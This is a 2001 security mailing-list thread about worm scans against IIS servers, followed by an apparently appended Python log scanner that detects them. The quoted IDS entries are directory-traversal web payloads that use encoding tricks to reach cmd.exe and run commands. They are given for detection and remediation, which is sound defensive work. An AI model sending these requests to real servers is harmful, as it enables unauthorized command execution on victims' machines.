Re: New Worm: Massive Scans for cmd.exe/root.exe (fwd)

From: BJ Bellamy (bellamybj@lycos.com)
Date: 09/18/01


To: "Focus-MS" <focus-ms@securityfocus.com>, "Marc Fossi" <mfossi@securityfocus.com>
Date: Tue, 18 Sep 2001 12:52:23 -0400
From: "BJ Bellamy" <bellamybj@lycos.com>
Message-ID: <CKJLMFAFCFMEPAAA@mailcity.com>
Subject: Re: New Worm:  Massive Scans for cmd.exe/root.exe (fwd)

Has anyone gotten an idea about how to deal with this worm?

According to CERT, (http://www.cert.org/current/current_activity.html#port80)
it appears to exploit MS00-078

http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS00-078.asp
Microsoft Security Bulletin (MS00-078)
Patch Available for Web Server Folder Traversal Vulnerability

But how do you remediate it?

Del readme.exe, root.exe, cmd.exe not in system32 and reboot?
Not to mention applying the patch!

Thanks to all,
BJ

---
-------------------------------------
Do not attribute to malice what can 
be better attributed to incompetence.
-------------------------------------

On Tue, 18 Sep 2001 09:30:29 Marc Fossi wrote:
>Here are the entries you should see in your IDS logs.
>
>Marc Fossi, MCSE
>SecurityFocus
>www.securityfocus.com
>
>
>GET /scripts/root.exe?/c+dir
>GET /MSADC/root.exe?/c+dir
>GET /c/winnt/system32/cmd.exe?/c+dir
>GET /d/winnt/system32/cmd.exe?/c+dir
>GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
>GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
>GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
>GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
>GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
>GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
>GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
>GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
>GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
>GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
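An added example, not from the thread or from SecurityFocus: a small log scanner that decodes the request paths quoted above the way the unpatched IIS decoder did (double percent-encoding such as %255c, and overlong UTF-8 such as %c0%af and %c1%9c, computed generally rather than from a fixed table) and flags requests that resolve to cmd.exe or root.exe. It assumes Common Log Format lines; the sample log below is constructed from the quoted entries.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Overlong two-byte UTF-8 (%c0%af, %c1%9c, %c1%1c, ...) that the vulnerable decoder
# collapsed to one ASCII byte; reproduce the arithmetic instead of hard-coding each variant.
OVERLONG_RE = re.compile(r"%c([01])%([0-9a-f]{2})")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+)')   # request path out of a CLF line
TARGETS = ("cmd.exe", "root.exe")

# Constructed sample log (not real traffic), built from the probes quoted in the thread.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Sep/2001:12:52:23 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
10.0.0.5 - - [18/Sep/2001:12:52:24 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
10.0.0.5 - - [18/Sep/2001:12:52:25 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
10.0.0.5 - - [18/Sep/2001:12:52:26 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 -
10.0.0.7 - - [18/Sep/2001:12:53:01 -0400] "GET /index.html HTTP/1.0" 200 1234
"""

def _overlong_to_char(m: "re.Match") -> str:
    lead, trail = 0xC0 | int(m.group(1), 16), int(m.group(2), 16)
    return chr(((lead & 0x1F) << 6) | (trail & 0x3F))   # c0 af -> '/', c1 9c -> '\\'

def normalize(path: str) -> str:
    """Resolve overlong sequences, percent-decode until the string stops changing
    (so %255c -> %5c -> '\\'), then fold backslashes to forward slashes."""
    s = path.lower()
    for _ in range(4):                      # bounded: nesting depth is attacker-controlled
        s = OVERLONG_RE.sub(_overlong_to_char, s)
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s.replace("\\", "/")

def classify(path: str) -> Optional[str]:
    """Reason string if the decoded path lands on cmd.exe/root.exe, else None."""
    norm = normalize(path).split("?", 1)[0]
    if not norm.endswith(TARGETS):
        return None
    name = norm.rsplit("/", 1)[-1]
    if "/../" in norm:
        return "traversal to " + name
    return "direct request for " + name     # e.g. a root.exe left by an earlier compromise

def scan_log(text: str) -> List[Tuple[str, str]]:
    """Return (raw path, reason) for every CLF line that carries one of the probes."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if m and (reason := classify(m.group(1))):
            hits.append((m.group(1), reason))
    return hits
```

Matching on the decoded path rather than on the literal strings in the IDS list is what keeps new encoding variants from slipping past the check.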
